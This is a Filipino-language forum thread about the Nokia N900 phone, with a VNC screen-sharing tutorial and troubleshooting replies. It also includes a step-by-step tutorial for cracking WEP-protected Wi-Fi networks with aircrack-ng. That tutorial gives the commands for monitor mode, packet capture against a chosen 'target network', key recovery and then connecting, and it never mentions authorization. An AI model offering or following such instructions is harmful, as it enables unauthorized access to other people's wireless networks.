Symbianize Forum

Most of our features and services are available only to members, so we encourage you to login or register a new account. Registration is free, fast and simple. You only need to provide a valid email. Being a member you'll gain access to all member forums and features, post a message to ask question or provide answer, and share or find resources related to mobile phones, tablets, computers, game consoles, and multimedia.

All that and more, so what are you waiting for, click the register button and join us now! Ito ang website na ginawa ng pinoy para sa pinoy!

[TUTORIALS] Nokia N900

Sir Topet!!!

Nakakita rin ako ng N900 sa physical appearance talaga..

Auction Sale kasi kanina (as of I post this) sa isang pawnshop dito sa amin..

12k po sir Topz! 99% scratch-free nang tinignan ko.. sayang, wala akong pera.. awawahahaha

Sir Topet!!!

Nakakita rin ako ng N900 sa physical appearance talaga..

Auction Sale kasi kanina (as of I post this) sa isang pawnshop dito sa amin..

12k po sir Topz! 99% scratch-free nang tinignan ko.. sayang, wala akong pera.. awawahahaha

Yup, astig diba? :)

Bihira na nga palang makakita ng brand new ngayon, kasi nag-uubos na lang ng stocks ang mga retail stores dahil hindi na yata pino-produce itong phone na ito. Parang gusto ko pa ngang bumili ng isa pa eh. :)

astig nga po sir.. sayang, hindi ako nakaka ere ng 12k instant.. ahahaha

Tutorial: View your N900 screen from your PC (using VNC)

Hi Friends,

Sharing to you some cool stuff that you can do with your N900. With the Nokia N900 you can:

- view and control your N900 screen from your desktop or laptop computer
- view and control your computer's screen from your Nokia N900

In this tutorial, I will share how you can view and control your N900 screen from your PC.

Tools:

For this to work, you will need:

1. A computer (desktop or laptop)
2. A working Internet connection (preferrably DSL)
3. A wireless router
4. A VNC application installed to your computer. For Windows users, you may want to download UltraVNC. For Linux users, you can install any VNC viewer application from your respective Package Manager (in Ubuntu you can search in the Ubuntu Software Center).

1. Install your VNC viewer application to your computer. In my case I'm using Linux (Ubuntu). I downloaded and installed the Gtk VNC Viewer.

attachment.php

2. In your Nokia N900, you will need to download and install an application called "x11vnc". You will not see it in your default Applicaions list. You have to enable first the "extra-devels" repository so that you can see it. Here's how to set it up:

- Application manager --> Application catalogs --> New
- Catalog name: Maemo Extras-devel
- Web address: http://repository.maemo.org/extras-devel
- Distribution: fremantle
- Components: free non-free

Press on "Save". The Application Manager will refresh (it may take a long time); just wait for it to finish.

Here's how it should look like. Note that I already disabled it, but for the purpose of installing the "x11vnc" application you have to enable it.

WARNING: There are a lot of unstable applications that will appear in your Nokia N900's Application Manager if you enable this repository, and you may be prompted to update. Please DO NOT UPDATE your other applications unless you know what you are doing. Only install the "x11vnc" for the purpose of this tutorial, and after that please disable this repository.

attachment.php

3. After the Application Manager has finished refreshing the list of applications, press on "All" and look for "x11vnc". You can use your N900 physical keyboard to search for it.

4. DISABLE THE "extras-devel" repository after installing the "x11vnc" application. Sorry makulit ako, it's for your own safety.

5. Download any other application on the N900 that allows you to see your phone's IP Address, because you will need to type this later. You can either download the "Personal IP Address" or "HealthCheck" application.

6. Turn on your VNC viewer application in your computer (UltraVNC, etc.). In my case I have turned on the Gtk VNC Viewer in Ubuntu. Type the IP Address of your Nokia N900. DO NOT CLICK ON CONNECT YET.

7. In your Nokia N900, press on the installed "x11vnc" application. The screen will look like this:

attachment.php

8. On your computer where the IP Address of the Nokia N900 is already typed in, click on Connect (or whatever button is needed for you to connect). No need to enter username or password.

Here it is. :)

attachment.php

attachment.php

attachment.php

attachment.php

Attachments

• Screenshot-gtkvncviewer.png
    Screenshot-gtkvncviewer.png
    29.3 KB · Views: 783
  • vnc.png
    vnc.png
    70.9 KB · Views: 782
  • Screenshot.png
    Screenshot.png
    282 KB · Views: 785
  • Screenshot-1.png
    Screenshot-1.png
    371.6 KB · Views: 783
  • Screenshot-2.png
    Screenshot-2.png
    417.1 KB · Views: 768
  • Screenshot-3.png
    Screenshot-3.png
    378 KB · Views: 760
ello sir my pang-extract ba ng .lzma file ang n900??? ieextract ko sana ung image ng easy debian ko hehehe and kung meron enge naman ng link and TUT na din hehehe thanks po ulit....

sir topet paOT po ask ko lang pano ko ba madodownload ung libgles1-sgx-img??? thanks

ello sir my pang-extract ba ng .lzma file ang n900??? ieextract ko sana ung image ng easy debian ko hehehe and kung meron enge naman ng link and TUT na din hehehe thanks po ulit....

Hi Friend,

Meron naman. Check mo lang sa Application Manager. Type mo lzma. Pero puwede naman mag-download and mag-install ka na lang ng 7zip sa computer mo para ma-extract mo yan.

Tutorial for Easy Debian? Meron friend, punta ka sa talk.maemo.org. :) Ito ang ginamit kong tutorial: http://talk.maemo.org/showthread.php?t=66531

sir topet paOT po ask ko lang pano ko ba madodownload ung libgles1-sgx-img??? thanks

Here's your answer: http://talk.maemo.org/showthread.php?t=43566

Hope this helps. :)

Last edited:
Last edited:

Hi Friend,

Ang compression/de-compression application na ginagamit sa .lzma files ay 7Zip, punta ka lang sa official website nila. So bale sa computer mo muna i-download yung image ng Easy Debian (punta ka sa www.maemo.org). Then download and install 7Zip. And then i-uncompress mo gamit yun. After that, i-copy mo papunta sa Nokia N900 (sa MyDocs). That's it. :)

Tutorial: Cracking Wireless Networks with aircrack-ng for N900

Friends,

I have already finished the initial test. Here are the steps to cracking a wireless network (WEP-protected). I will update this thread to post the instructions for cracking networks that are protected with WPA/WPA2 encryption.

1. Change the wireless receiver to Monitor Mode (listen to data packets)

Code:
root
Code:
[SIZE=4]ifconfig wlan0 down[/SIZE]
[SIZE=4]iwconfig wlan0 mode Monitor[/SIZE]
[SIZE=4]ifconfig wlan0 up[/SIZE]
attachment.php

2. Monitor for possible target networks

Code:
 airodump-ng wlan0
- Press Ctrl + C on your N900 physical keyboard to stop if you are already satisfied.

- Identify your target network from the list (should have WEP encryption).

attachment.php

3. Capture data packets (IVs)

Code:
 airodump-ng --channel (enter the channel number of your target here) --bssid (enter MAC address of target here) -w (filename of your captured  data, you can enter whatever you want) --ivs wlan0
Example:

Code:
airodump-ng --channel 11 --bssid xx:xx:xx:xx:xx -w susi --ivs wlan0
- Press Ctrl + C on your N900 physical keyboard to stop
- Wait until you capture at least 15,000 up to around 400,000 packets (check #Data column)

attachment.php

attachment.php

4. Crack the WEP key

Code:
 aircrack-ng susi*.ivs
- Placing an asterisk (*) instructs aircrack-ng to do a "wild card" search.

- In the example command above, the filename that I used for the captured files is "susi".

attachment.php

- Once discovered, WEP Key is in this format xx:xx:xx:xx. Just remove the ":" when typing this key to connect to your target network.

attachment.php

5. Change the wireless receiver back to Managed Mode

Code:
root (you may get an error message if you are already in "root" state, just ignore and proceed with the next commands)
Code:
[SIZE=4]ifconfig wlan0 down[/SIZE]
[SIZE=4]iwconfig wlan0 mode Managed[/SIZE]
[SIZE=4]ifconfig wlan0 up[/SIZE]
attachment.php

- Now try to connect to your target network.
- When asked for the password, enter the password that you were able to discover. Just type the password without the colons ":" .

Notes:

- EDIT: you need to install the "bleeding-edge" wireless drivers. After that, the steps above worked for me.
- Make sure to install aircrack-ng first or this will not work. To install aircrack-ng you need to add or enable the "extras-devel" repository. Read here for more.
- The instructions are for cracking wireless networks that are protected by WEP Encryption only. Instructions for WPA/WPA2 will be posted separately.

I simply followed the instructions here: http://www.youtube.com/watch?v=txBfZr-fFag

Hope this helps. :)

Attachments

• Step 03b.png
    Step 03b.png
    64.2 KB · Views: 1,230
  • Step 03a.png
    Step 03a.png
    62.7 KB · Views: 1,221
  • Step 02b.png
    Step 02b.png
    61.9 KB · Views: 1,250
  • Step 02a.png
    Step 02a.png
    53 KB · Views: 1,234
  • Step 01.png
    Step 01.png
    50.4 KB · Views: 1,253
  • Step 04.png
    Step 04.png
    50.6 KB · Views: 1,222
Last edited:
Tutorial: GUI-based Complete Aircrack Package

Friends,

I recently visited the forum site of Maemo. They have great developments on coming up with a GUI-based (front-end instead of using the Terminal) application for aircrack-ng.

Here it is. Enjoy!: http://talk.maemo.org/showthread.php?t=69449

bro while ff the step mo sa "airodump-ng wlan0" baket sa screen ko wala yung cipher auth essid at pati rin yung sa baba packets at probe. normal lang ba yun o may kulang pa ako na i install? :noidea:

bro while ff the step mo sa "airodump-ng wlan0" baket sa screen ko wala yung cipher auth essid at pati rin yung sa baba packets at probe. normal lang ba yun o may kulang pa ako na i install? :noidea:

Hi Friend,

Ilang minutes ka nang naghintay? Achaka may wi-fi ba nearby?

EDIT: check natin kung tama yung mga naka-install sa iyo...baka kailangan naka-install sa iyo ang wi-fi drivers na "bleeding edge".

1. Type mo ito sa XTerminal and then paki-post dito yung result:

Code:
uname -a

2. Type mo ito sa XTerminal and then paki-post dito yung result:

Code:
iwconfig

Code:
ifconfig

3. Do Step 1 sa Tutorial, and then gawin mo ulit yung #2 sa post na ito.

Last edited:
cge post ko mamaya bro.. try ko po yung wifi namin kung working sa fon ko..

uname -a =linux nokia-n900 2.6.28.10power46 #1 PREEMPT Thu Nov 18 17:04:59 EET 2010 armv71 unknown

ang iwcofig at ifconfig not found..may kulang pala ako i install?

Last edited:

uname -a =linux nokia-n900 2.6.28.10power46 #1 PREEMPT Thu Nov 18 17:04:59 EET 2010 armv71 unknown

Okay, friend. Matutulog na ako may work pa ako mamaya. Anyway, should you need the driver, it is found in the forum site of Maemo. Here's the direct link to the exact post: http://talk.maemo.org/showpost.php?p=912050&postcount=176. The file is supposed to be around 140-something MB.

Got it. So meaning you already have the bleeding-edge wireless driver installed.

Sorry, almost forgot. You need to run iwconfig or ifconfig as root. Bale ganito:

Code:
sudo ifconfig
sudo iwconfig

Paki-balikan na lang yung post ko ulit and follow the instructions, just make sure may "sudo" before the command.

EDIT: you do not have the bleeding edge drivers pa pala. You installed the power-kernel (the one that is downloaded from the Application Manager)...yan yung kernel version na pang-overclock ng N900. In my case I already installed the bleeding edge drivers, pero hindi ko pa siya ginagamit when I made the tutorial. Sabi kasi ng video sa YouTube hindi pa niya ginagamit ang bleeding edge (i.e. any updated drivers) nung ginawa niya. Ginaya ko lang ang video niya as-is.

Based sa mga nabasa ko sa forum site ng Maemo, medyo nagkaka-problem ang mga users when they have both the power-kernel (yung pang-overclock) and yung power-kernel (yung bleeding edge wireless drivers) na sabay. May proper way ng pag-install kung gusto mo silang dalawa nasa N900 mo, pero ako I haven't done it yet. Sa weekend ko pa lang gagawin, medyo busy eh. Lalabas kasi na magiging multi-boot ang N900 mo pag naka-install ang dalawang yan. Pag hindi mo nasunod nang mabuti ang instructions para sa ganyang setup, baka mag-looping reboot ang N900 mo (looping reboot = reboot lang nang reboot).

Last edited:
bro wala pa akong bleeding edge nka install sa fon ko power kernel lang ang naka install. package ata to nung ng install ako ng h-e-n. just wondering baket my kulang sa screnshot mo at saken..hehe..try ko maya pag install sa bleeding edge bro..tnx

EDIT:

ifconfig- link encap:local loopback
inet addr: 127.0.0.1 Mask:255.0.0.0
inet6 addr: : :1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:751 errors:0 dropped:0 overuns:0 frame0

iwconfig- no wireless extension

Last edited:
Back
Top Bottom